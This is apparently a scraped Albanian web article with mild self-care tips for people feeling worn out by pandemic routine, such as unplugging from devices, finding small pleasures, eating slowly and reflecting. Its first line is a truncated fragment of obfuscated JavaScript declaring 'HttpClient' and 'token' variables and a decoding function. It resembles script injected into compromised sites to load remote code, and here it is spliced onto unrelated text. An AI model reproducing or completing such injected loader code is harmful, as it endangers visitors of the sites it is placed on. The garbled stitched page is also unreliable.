;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Jeni lodhur nga jeta?! Ja disa këshilla se si ta kapërceni një gjendje të tillë

By

Monotonia e përditshmërisë, normat e distancimit shoqëror dhe kufizimet në lëvizjen e lirë në mes të pandemisë, mund t’ju bëjë të ndiheni të rraskapitur pas një kohe të caktuar.

Por të ndihesh kështu është normale. Dhe në vend që të injoroni ose shmangni ndjenja të tilla, është e rëndësishme t’i përqafoni ato dhe të bëni një pushim.

Pra, është e rëndësishme të bëni një pushim nga puna, rutina dhe kërkesat e jetës në mënyrë që t’i lejoni vetes një shkëputje nga jeta kur të vini në dyshim kuptimin e ekzistencës tuaj, thonë ekspertët.

Shkëputuni nga jeta virtuale

Mbyllni të gjitha shpërqendrimet elektronike, kompjuter, tabletë, telefon, të gjitha, gjithçka që mund të ndezë ose të tërheqë vëmendjen tuaj. Kaloni pak kohë me botët ose me mendjen tuaj.

Gjeni momente lumturie

Kjo mund të nënkuptojë të dalësh jashtë dhe të ndjesh diellin në lëkurën tënde, të dëgjosh muzikën që të pëlqen, ose të hash një copë çokollatë, shkruan KK. Bëni zgjedhjen për të qenë të lumtur dhe do të jetoni një jetë shumë të gëzueshme.

Hani pa u nxituar

Mos hani shpejt. Hani ngadalë me mendje dhe mirënjohje, duke shijuar çdo kafshatë.

Ndalo dhe reflekto

Merrni kohë për të vëzhguar detajet e vogla. Shikoni me kujdes gjërat që zakonisht i merrni si të mirëqena.

Artikuj të ngjashëm